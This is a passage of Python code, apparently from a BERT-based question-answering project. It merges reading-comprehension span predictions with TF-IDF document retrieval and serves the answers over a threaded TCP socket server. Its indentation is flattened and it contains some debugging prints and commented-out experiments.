"TempAllpredict_Layer1",
["question" , "TempAllpredictList_Layer2"])
_TempAllpredict_Layer2 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer2",
["doc_id","doc_text","best_ans","best_prob"])
#-------------------------------------------------------------------------------
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
all_predicts = []
all_predictsInOneQues = []
quesList = []
Aten_result_list = []
Aten_result3_list = []
TempAllpredictLayer1_list = []
TempAllpredictLayer2_list = []
best_answer=""
best_prob=0.0
ans_is_null = True
#ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
if example_in_write_predictions == 1:
print ("example idx:%d" %example_index)
print("question in example from predict")
print(example.question_text)
print("doc_tokens in example from predict")
print(example.doc_tokens)
print('-'*60)
print('\n')
doc_names = []
doc_scores = []
try:
doc_names, doc_scores = ranker.closest_docs( example.question_text, 10 )
except:
doc_names.append('None')
doc_scores.append(0)
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min mull score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
# if we didn't inlude the empty option in the n-best, inlcude it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
#參考
probs = _compute_softmax(total_scores)
nbest_json = []
for i, entry in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
#----------------------------------------------
# presupposition : Question is in order
#"question", "PredictResults"
if example.question_text not in quesList :
if len(quesList)!=0 :
#1. Save to all predicts
#print('all_predictsInOneQues-')
#print(all_predictsInOneQues)
temp = copy.deepcopy(all_predictsInOneQues)
#print('temp')
#print(temp)
all_predicts.append(
_AllPredictions(
question=quesList[-1],
PredictListOneQues=temp
)
)
#2.TODO : Find the result (move to outside)
#3. reset all_predictsInOneQues
all_predictsInOneQues.clear()
#. Add to questList
quesList.append(example.question_text)
#----------------------------------------------
# save answer dataset
#----------------------------------------------
all_predictsInOneDoc = []
#print('go to (1)')
for i, entry in enumerate(nbest):
tp_answer = entry.text
#print('ids:%d:%s' %(i,tp_answer))
for i, entry in enumerate(nbest):
tp_answer = entry.text
if len(all_predictsInOneDoc) != 0:
break
temp = tp_answer.replace(" ", "")
if not temp:
continue
if len(tp_answer) < 3:
if not RepresentsInt(tp_answer):
continue
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
if len(all_predictsInOneDoc) == 0:
for i, entry in enumerate(nbest):
if predict_result_index == 1:
print(entry)
if i == 2:
if predict_result_index == 1:
print('In state 2')
break
tp_answer = entry.text
if i == 0:
if tp_answer.isspace() or not tp_answer:
if predict_result_index == 1:
print('In state 0,tp_ans: %s' % tp_answer)
continue
if i == 1 and len(all_predictsInOneDoc) != 0:
if predict_result_index == 1:
print('In state 1,tp_ans: %s' % tp_answer)
break
if predict_result_index == 1:
print('In state set pridict. tp_ans: %s' % tp_answer)
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
nbest.clear()
#print('go to (2)')
#----------------------------------------------
# End of save answer dataset
if predict_result_index == 1:
for i, entry in enumerate(all_predictsInOneDoc):
print('index:%d' %i)
print("answer: %s" %(entry.answer))
print("prob: %s" %(entry.prob))
print("start: %s" %(entry.start))
print("end: %s" %(entry.end))
print('\n')
print('-'*15)
print('\n')
#----------------------------------------------
tp_docscore = 0.0
if example.doc_id in doc_names :
tp_docindex = doc_names.index(example.doc_id)
tp_docscore = doc_scores [tp_docindex]
#print('go to (4)')
#print('go to (5)')
#print('all_predictsInOneQues-in set')
#print(all_predictsInOneQues)
all_predictsInOneQues.append(
_AllPredictResultsInOneQuestion(
doc_text=example.doc_tokens,
doc_id=example.doc_id,
doc_score=tp_docscore,
PredictListOneDoc=all_predictsInOneDoc
)
)
#----------------------------------------------
# if example is examples last data
if example == all_examples[-1] :
all_predicts.append(
_AllPredictions(question=example.question_text,PredictListOneQues=all_predictsInOneQues))
#----------------------------------------------
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
if best_non_null_entry == None :
score_diff = FLAGS.null_score_diff_threshold + 1.0
else:
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
# Find the best answer from Aten collections
#----------------------------------------------
retriever_weight = FLAGS.retriever_weight
for i, entry_predicts in enumerate(all_predicts):
tp_ques = entry_predicts.question
QuesList = entry_predicts.PredictListOneQues
#print("ques: %s" %(tp_ques))
# set score only with bert , TF-IDF used to be choice doc.
#----------------------------------------------
QuesList.sort(key=TakeThird, reverse=True)
#print('len with QuesList:%d' %len(QuesList))
tp_text1 = QuesList[0].doc_text
text1=""
for word in tp_text1:
text1= text1 + " " + word
ans1=""
ans1_prob = 0.0
TFIDF1 = QuesList[0].doc_score
Score1 = 0.0
entry_OneDoc = QuesList [0].PredictListOneDoc
if len(entry_OneDoc) != 0 :
ans1 = entry_OneDoc[0].answer
ans1_prob = entry_OneDoc[0].prob
for k, entry_OneAns in enumerate(entry_OneDoc):
#print('index:%d' %k)
tp_ans1_prob = Decimal(entry_OneAns.prob)
if tp_ans1_prob > ans1_prob:
ans1_prob = tp_ans1_prob
ans1 = entry_OneAns.answer
#print('Ans_ans:%s' %(entry_OneAns.answer))
#print('Ans_prob:%e , start:%e , end:%e' %(entry_OneAns.prob , entry_OneAns.start , entry_OneAns.end))
Score1 = ans1_prob
#----------------------------------------------
# set score with bert and TF-IDF
#----------------------------------------------
text2=""
ans2=""
ans2_prob = 0.0
TFIDF2 = 0.0
Score2 = 0.0
for j , entry_OneDoc in enumerate(QuesList):
tp_TFIDF2 = entry_OneDoc.doc_score
tp_text2=""
for word in entry_OneDoc.doc_text:
tp_text2 = tp_text2 + " " + word
DocList = []
DocList = entry_OneDoc.PredictListOneDoc
for k, entry_OneAns in enumerate(DocList):
tp_ans2_prob = Decimal(entry_OneAns.prob)
tp_Score2 = Decimal(retriever_weight)*Decimal(tp_TFIDF2) + Decimal(1.0-retriever_weight)*Decimal(tp_ans2_prob)
if tp_Score2>Score2:
text2=tp_text2
ans2=entry_OneAns.answer
ans2_prob=tp_ans2_prob
TFIDF2=tp_TFIDF2
Score2 =tp_Score2
#----------------------------------------------
fin_text = text1
fin_ans = ans1
fin_ans_prob = ans1_prob
fin_TFIDF = TFIDF1
fin_Score = Score1
choice_value = 0
if TFIDF1<FLAGS.choice_score:
#print("Answer2 State1")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
elif ans2_prob>ans1_prob*2 and ans2_prob > FLAGS.threshold_prob_ans_merge:
#print("Answer2 State2")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
else:
use_ans2 = False
if len(ans1)<3:
#print("Answer2 State3,len=%d" %len(ans1))
use_ans2 = True
else:
for char in ans1:
#print("Answer2 State4")
if char<' ' or char>'~' :
print(ord(char))
use_ans2 = True
break
if use_ans2 == True :
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
#else:
#print("Answer1 State1")
ans_list.append(fin_ans)
text_list.append(fin_text)
if FLAGS.show_all_choice == 0:
Aten_result3_list.append(
_FinalResult3(
question = tp_ques,
text = fin_text,
ans = fin_ans,
ans_prob = fin_ans_prob,
TFIDF = fin_TFIDF,
Score = fin_Score,
choice = choice_value
)
)
else :
Aten_result3_list.append(
_FinalResultAll(
question = tp_ques,
text1 = text1,
ans1 = ans1,
ans_prob1 = ans1_prob,
TFIDF1 = TFIDF1,
Score1 = Score1,
text2 = text2,
ans2 = ans2,
ans_prob2 = ans2_prob,
TFIDF2 = TFIDF2,
Score2 = Score2,
choice = choice_value
)
)
print('ques: %s' %tp_ques)
if FLAGS.show_all_choice==1:
print('-'*5)
print('Only Bert (TF-IDF used to be choice document):')
print('text: %s' %text1)
print('ans: %s' %ans1)
print('Show ans1:')
print('ans_prob: %s' %ans1_prob)
print('TFIDF: %s' %TFIDF1)
print('Score: %s' %Score1)
print('')
print('-'*5)
print('Merge TF-IDF:')
print('text: %s' %text2)
print('ans: %s' %ans2)
print('ans_prob: %s' %ans2_prob)
print('TFIDF: %s' %TFIDF2)
print('Score: %s' %Score2)
print('-'*5)
print('My Choice ans(%d):' %choice_value)
print('text: %s' %fin_text)
print('ans: %s' %fin_ans)
print('ans_prob: %s' %fin_ans_prob)
print('TFIDF: %s' %fin_TFIDF)
print('Score: %s' %fin_Score)
# ack message to Colab Client
#temp_answer = 'Dr_Answer' + fin_ans + 'Dr_QA' + fin_text + '<AtenEnd>'
Aten_result3_list.clear()
return ans_list, text_list
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
# Therefore, we have to apply a semi-complicated alignment heruistic between
# `pred_text` and `orig_text` to get a character-to-charcter alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.logging.info(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.logging.info("Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text, tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, predict_fn):
self.num_features = 0
self.predict_fn=predict_fn
self.tf_examples = []
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature
self.num_features += 1
#print('process_feature:%d'%self.num_features)
features = collections.OrderedDict()
features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
outs = self.predict_fn( {'examples':[tf_example.SerializeToString()]} )
all_results_pb.append( outs )
self.tf_examples.clear()
'''
self.tf_examples.append(tf_example.SerializeToString())
if self.num_features%FLAGS.predict_batch_size==0:
if len(self.tf_examples)!=8:
print('size error:%d' %len(self.tf_examples))
outs = self.predict_fn
(
{
'examples':[
self.tf_examples[0],self.tf_examples[1],self.tf_examples[2],self.tf_examples[3],
self.tf_examples[4],self.tf_examples[5],self.tf_examples[6],self.tf_examples[7]
]
}
)
all_results_pb.append( outs )
for i, out in enumerate(outs):
#print('Index %d:' %i)
#print(out)
all_results_pb.append( out )
self.tf_examples.clear()
'''
def close(self):
'''
if len(self.tf_examples)!=0:
print('aligement data error (%d)In FeatureWriter' %(len(self.tf_examples)) )
'''
self.tf_examples.clear()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_file:
raise ValueError(
"If `do_predict` is True, then `predict_file` must be specified.")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
# Retriever - added by Willy
if FLAGS.do_retriever:
if not FLAGS.retriever_model:
raise ValueError("You have to set retriever model(give the path) when you set do_retriever to Yes.")
if FLAGS.document_type != 'Sqlite' or FLAGS.db_file == None :
raise ValueError("You have to set document_type to Sqlit and set the db_file when you set do_retriever to Yes.")
# TODO : think a mechanism to chek these key word
'''
if FLAGS.document_type is 'SQlite':
# TODO: set database
elif FLAGS.document_type is 'Text':
# TODO: set text file
elif FLAGS.document_type is 'SQuAD':
# is original method
else :
raise ValueError(
"You have to set correct document_type: (1)'SQlite' (2)'Text' (3)SQuAD.")
'''
def read_squad_documents(input_file):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
documents = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
documents.append(paragraph["context"])
return documents
def read_sqlite_documents(input_file):
# TODO
db_class = retriever.get_class('sqlite')
with db_class(input_file) as doc_db:
doc_ids = doc_db.get_doc_ids()
for ids in doc_ids:
documents.append(doc_db.get_doc_text(ids))
doc_db.close()
DOC2IDX = {doc_id: i for i, doc_id in enumerate(doc_ids)}
return DOC2IDX, documents
def read_text_documents(input_file):
examples = []
file = open(input_file, "r")
documents = file.read()
file.close()
documents_split = documents.split('\n')
documents_final = list(filter(None, documents))
return documents_final
def read_squad_question(input_file):
questions = []
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
questions.append(qa["question"])
return questions
def set_eval_examples(questions, DOC2IDX):
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
eval_examples = []
temp_list = []
for i, DOCID in enumerate(DOC2IDX) :
temp_list.append(DOCID)
for question in questions:
#-------------------------questions - Start---------------------------#
question_text = question
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
#-------------documents - Start--------------#
for i , paragraph_text in enumerate(documents):
paragraph_text = paragraph_text
#-------paragraphs - Start-------#
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
#-------paragraphs - End-------#
qas_id = str(uuid.uuid1())
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_id = temp_list[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
eval_examples.append(example)
#-------------documents - Start--------------#
#-------------------------questions - End-----------------------------#
if example_in_set_eval_examples == 1:
print('len of eval_examples:%d' %len(eval_examples))
for i, example in enumerate(eval_examples):
print(i)
print (example.question_text)
'''
for i, example in enumerate(eval_examples):
print('idx:%d:%s' %(i,example.question_text))
'''
return eval_examples
from socket import *
import sys
import threading
import time
from time import localtime
import imp
BUFSIZ = 4096
if sys.version[0] == '2':
imp.reload(sys)
sys.setdefaultencoding("utf-8")
class TcpServer():
def __init__(self,tokenizer,DOC2IDX):
self.HOST = FLAGS.Host_TCPServer
self.PORT = FLAGS.PORT_TCPServer
self.tokenizer = tokenizer
self.ADDR = (self.HOST,self.PORT)
self.DOC2IDX = DOC2IDX
self.STOP_CHAT = False
self.STOP_listen = False
self.predict_input_fn = None
try:
self.sock = socket(AF_INET, SOCK_STREAM)
print('%d is open' %self.PORT)
self.sock.bind(self.ADDR)
self.sock.listen(5)
# 设置退出条件
# 所有监听的客户端
self.clients = {}
self.thrs = {}
self.stops = []
print("before init predict_input_fn")
export_dir = FLAGS.EXPORT_PREDICT_PATH
print('export_dir:')
print(export_dir)
for x in Path(export_dir).iterdir():
print('x:')
print(x)
if('temp' in str(x)):
print('temp is in the x')
print("finish x")
subdirs = [x for x in Path(export_dir).iterdir()
if x.is_dir() and 'temp' not in str(x)]
print("After init predict_input_fn")
print(subdirs)
latest = str(sorted(subdirs)[Model_ListIndex])
print("init predict_input_fn step1")
self.predict_input_fn = tfori.contrib.predictor.from_saved_model(latest)
print("init predict_input_fn finish")
#self.predict_input_fn = tf.contrib.predictor.from_saved_model("")
except Exception as e:
print("%d has some init error" %self.PORT)
return None
def listen_client(self):
while not self.STOP_CHAT:
print(u'等待接入,侦听端口:%d' %self.PORT)
self.tcpClientSock, self.addr = self.sock.accept()
print(u'接受连接,客户端地址:', self.addr)
while len(self.stops)!=0:
address_stop = self.stops.pop()
self.thrs[address_stop].join()
address = self.addr
# 将建立的client socket链接放到列表self.clients中
self.clients[address] = self.tcpClientSock
# 分别将每个建立的链接放入进程中,接收且分发消息
self.thrs[address] = threading.Thread(target=self.readmsg, args=[address])
self.thrs[address].start()
time.sleep(0.5)
#self.tcpClientSock.send(b'you are connect...')
self.close_all()
print(u'系統結束')
def readmsg(self, address):
# 如果地址不存在,则返回False
if address not in self.clients:
return False
# 得到发送消息的client socket
client = self.clients[address]
while True:
try:
# 获取到消息内容data
data = client.recv(BUFSIZ)
except:
print(error)
self.close_client(address)
break
try:
temp = data.decode('utf8')
except:
print('data is not utf8 :%s' %(str(data)) )
self.close_client(address)
break
# python3使用bytes,所以要进行编码
# s='%s发送给我的信息是:[%s] %s' %(addr[0],ctime(), data.decode('utf8'))
# 对日期进行一下格式化
ISOTIMEFORMAT = '%Y-%m-%d %X'
stime = time.strftime(ISOTIMEFORMAT, localtime())
print([address], '@',[stime],':', data.decode('utf8'))
if len(data)<1:
if self.STOP_CHAT:
break
print('data is not reasonable:')
print(data)
self.close_client(address)
break
else:
self.STOP_CHAT = (data.decode('utf8').upper() == "QUIT")
if self.STOP_CHAT:
print("quit")
self.close_client(address)
print("already quit")
break
elif data.decode('utf8') == Disconnect_KEYWORD:
print("disconnect")
self.close_client(address)
break
#tokenizer = self.tokenizer
#estimator = self.estimator
#DOC2IDX = self.DOC2IDX
question = data.decode('utf8')
#print('My question:',question)
if FLAGS.do_predict:
# define
#---------------------------------------------------
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
# ---------------------------------------------------
print('WillyTest(1)...do Set question:%s' %(FLAGS.question_type))
# ---------------------set question , changed by willy---------------------#
questions = list()
questions.append(question)
#-------------------------------------------------------------------------#
print('WillyTest(2)...do Set eval_examples')
eval_examples=set_eval_examples(questions,self.DOC2IDX)
print('WillyTest(2.1)...do FeatureWriter')
eval_writer = FeatureWriter(
predict_fn=self.predict_input_fn
)
print('WillyTest(2.2)...do convert_examples_to_features')
convert_examples_to_features(
examples=eval_examples,
tokenizer=self.tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature
)
eval_writer.close()
tf.logging.info("***** Running predictions *****")
tf.logging.info(" Num orig examples = %d", len(eval_examples))
tf.logging.info(" Num split examples = %d", len(eval_features))
tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
#print('WillyTest(5)...before redict_input_fn = input_fn_builder: eval_writer.filename=%s, FLAGS.max_seq_length=%d' %(eval_writer.filename,FLAGS.max_seq_length))
all_results = []
for result in all_results_pb:
'''
for item in result:
print(item)
print(result["unique_ids"])
'''
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(RawResult(unique_id=unique_id,start_logits=start_logits,end_logits=end_logits))
list_ans,list_text = write_predictions(
eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case
)
temp_answer = ''
if len(list_ans)==1 and len(list_text)==1:
temp_answer = 'Dr_Answer' + list_ans[0] + 'Dr_QA' + list_text[0] + '<AtenEnd>'
client.send(temp_answer.encode('utf8'))
else:
print("Willy warning: write_predictions is not valid....")
print('list_ans')
print(list_ans)
print('list_text')
print(list_text)
#clear list
eval_features.clear()
eval_examples.clear()
all_results.clear()
questions.clear()
'''
feature_spec = {
"input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"unique_ids": tf.FixedLenFeature([1], tf.int64),
}
print ("feature_spec1")
print (feature_spec)
'''
'''
feature_spec = {
"unique_ids": np.asarray(eval_features[0].unique_id).tolist(),
"input_ids": np.asarray(eval_features[0].input_ids).tolist(),
"input_mask": np.asarray(eval_features[0].input_mask).tolist(),
"segment_ids": np.asarray(eval_features[0].segment_ids).tolist()
}
print ("feature_spec2")
print (feature_spec)
'''
'''
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=[1],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
out = self.predict_input_fn({'examples':[str(feature_spec)]})
'''
'''
inputs = collections.OrderedDict()
inputs["input_ids"] = create_int_feature(features[0].input_ids)
inputs["input_mask"] = create_int_feature(features[0].input_mask)
inputs["segment_ids"] = create_int_feature(features[0].segment_ids)
inputs["unique_ids"] = create_int_feature([features[0].unique_id])
print("Do input finish")
print(inputs)
print("Before do train")
tf_example = tf.train.Example(
features=tf.train.Features(
feature=inputs
)
)
'''
'''
tf_example = tf.train.Example(
features=tf.train.Features(
{
"input_ids": create_int_feature(eval_features[0].input_ids),
"input_mask": create_int_feature(eval_features[0].input_mask),
"segment_ids":create_int_feature(eval_features[0].segment_ids),
"unique_ids": create_int_feature([eval_features[0].unique_id]),
})
)
print("Before do predict")
print('Show tf_example:')
print(tf_example)
'''
#out = self.predict_input_fn({'examples':[tf_example.SerializeToString()]})
#out = self.predict_input_fn({'examples':[str(feature_spec)]})
'''
tf_example = tf.train.Example(features=tf.train.Features(feature=inputs))
out = self.predict_input_fn({'examples':[tf_example.SerializeToString()]})
print('Output Data:')
print(out)
'''
'''
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False
)
all_results = []
print('WillyTest(6)...before estimator predict')
for result in self.estimator.predict(predict_input_fn, yield_single_examples=True):
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(RawResult(unique_id=unique_id,start_logits=start_logits,end_logits=end_logits))
print('WillyTest(8)...before write_predictions')
list_ans,list_text = write_predictions(
eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case
)
'''
def close_all(self):
try:
keys=self.clients.keys()
for address in keys:
client = self.clients.pop(address)
client.close()
time.sleep(1)
thr = self.thrs[address].pop()
thr.join()
except:
print(u'try fault')
pass
print(u'all client 已经退出')
def close_client(self, address):
try:
client = self.clients.pop(address)
self.stops.append(address)
print(u'try close client')
client.close()
print(u'try close recv thres')
#thr = self.thrs[address].pop()
#thr.join()
'''
for k in self.clients:
print(u'try leave')
print(u'try client1:', [self.clients[k]])
print(u'try client2:', [self.clients[address]])
print(u'try client3:', [k])
print(u'try client4:', [address])
client = self.clients.pop(k)
#print(u'try leave1')
#self.stops.append(k)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
except:
print(u'try fault')
pass
print(str(address) + u'已经退出')
def main(_):
global ranker
tf.logging.set_verbosity(tf.logging.INFO)
print(willy_check_code)
print('Bert config: %s' %(FLAGS.bert_config_file))
